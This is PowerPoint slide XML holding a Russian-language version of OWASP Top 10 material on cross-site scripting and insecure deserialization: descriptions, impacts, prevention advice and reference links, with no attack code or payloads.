                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Приложение или API включает непроверенные и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>непреобразованные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>данные в состав HTML. Успешная атака может привести к выполнению произвольного HTML- и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-кода в браузере жертвы. Обычно злоумышленнику необходимо убедить пользователя перейти по ссылке, ведущей на вредоносную страницу, например, используя атаку типа "водопой" или рекламу.</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Межсайтовое выполнение хранимых </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сценариев</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Stored XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Приложение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>или API сохраняет необработанные входные данные, с которыми затем взаимодействуют пользователи или администраторы. Межсайтовое выполнение хранимых сценариев обычно считается очень опасной уязвимостью.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Межсайтовое выполнение сценариев на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>основе объектной модели документа </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript-фреймворки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, одностраничные приложения и API, динамически добавляющие вредоносные данные на страницы, подвержены XSS на основе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>В идеале, приложение не должно отправлять вредоносные данные небезопасным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 API.</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Обычно XSS используется для перехвата сессий, кражи учетных записей, обхода МФА, замены или подмены </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>узлов </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(напр., троянские панели входа в систему), а также атак на браузеры, например, для загрузки вредоносного ПО, регистрации нажатий и других атак на стороне клиента.</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800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="8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Кодирование данных</a:t>
            </a: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Проверка данных</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V5</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Отраженное межсайтовое выполнение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7"/>
              </a:rPr>
              <a:t>Руководство OWASP по тестированию: Межсайтовое выполнение хранимых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XSS на основе объектной модели документа</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9"/>
              </a:rPr>
              <a:t>Памятка OWASP: Предотвращение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0"/>
              </a:rPr>
              <a:t>Памятка OWASP: Предотвращение XSS на основе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="77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1"/>
              </a:rPr>
              <a:t>Памятка OWASP: Обход фильтра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2"/>
              </a:rPr>
              <a:t>Проект кодировщика </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> от OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="8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hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE-79: Некорректная нейтрализация входных данных от пользователей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>: Внедрение в пользовательские шаблоны</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Для предотвращения XSS необходимо отделять непроверенные данные от активного контента браузера. Этого можно достичь следующими способами:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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с автоматическим </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="77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преобразованием </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данных, как в последних версиях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Ruby</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on</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Rails</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React</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JS. Необходимо также проанализировать ограничения XSS-защиты каждого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фреймворка</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обеспечить соответствующую обработку этих исключений.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="1" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="77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Преобразовывать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недоверенные</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данные из HTTP-запросов, основываясь на контексте, в HTML-коде (теле, атрибутах,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CSS или URL) для предотвращения отраженного XSS и межсайтового выполнения хранимых сценариев.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9"/>
              </a:rPr>
              <a:t>"Памятка OWASP: Предотвращение XSS"</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содержит подробные инструкции по </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="77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преобразованию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данных.</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Применять контекстное кодирование при изменении документа в браузере пользователя для предотвращения XSS на основе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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DOM</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Если это невозможно, то применять контекстное кодирование к API браузера (см.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"Памятку OWASP: Предотвращение XSS на основе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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DOM</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5"/>
              </a:rPr>
              <a:t>политику защиты содержимого (CSP)</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для предотвращения XSS. Эта мера эффективна, если отсутствуют уязвимости, позволяющие внедрить код через локальные файлы (напр., используя подмену путей или уязвимые библиотеки из разрешенных сетей доставки контента).</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A7</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Межсайтовое выполнение сценариев (XSS</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950190756"/>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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Технические: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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Автоматизированные инструменты могут обнаруживать и эксплуатировать все три вида межсайтового выполнения сценариев, более того, фреймворки для их эксплуатации можно найти в открытом доступе.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Межсайтовое выполнение сценариев (XSS) является второй по распространенности уязвимостью из Топ-10 OWASP и обнаруживается в двух третях всех приложений.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Автоматизированные инструменты могут обнаруживать XSS автоматически, особенно в случае проработанных технологий, таких как PHP, J2EE / JSP и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Межсайтовое выполнение сценариев будет иметь последствия средней степени тяжести в случае отраженного XSS или XSS на основе объектной модели документа и серьезные последствия в случае межсайтового выполнения хранимых сценариев с удаленным выполнением кода в браузере пользователя, например, кража учетных данных, перехват сессий или установка вредоносного ПО.</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36385"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52085"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3113965" y="1061610"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500650" y="1156860"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855880" y="1515254"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId21"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11240" y="1511660"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Приложения и API уязвимы, если осуществляют </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>десериализацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> вредоносных или модифицированных объектов, предоставляемых злоумышленником. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Это позволяет осуществить два основных типа атак:</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атаки, связанные со структурой объектов и данных, когда злоумышленник изменяет логику приложения или удаленно выполняет произвольный код при наличии доступных приложению классов, поведение которых может меняться во время или после </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>десериализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</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атаки с подменой данных, например, связанные с управлением доступом, когда используются существующие структуры данных, но изменяется содержимое.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сериализация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> может использоваться в приложениях для:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800"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удаленного и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>межпроцессного</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> взаимодействия (RPC/IPC); </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проводных протоколов, веб-служб, брокеров сообщений;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800"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кэширования или сохранения данных;</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баз данных, серверов кэширования, файловых систем; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-файлов HTTP, параметров HTML-форм, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>токенов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> аутентификации API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сценарий №1</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React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-приложение вызывает набор </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>микрослужб</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Spring</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Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Будучи функциональными программистами, разработчики попытались обеспечить неизменяемость своего кода. Используемое ими решение заключается в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
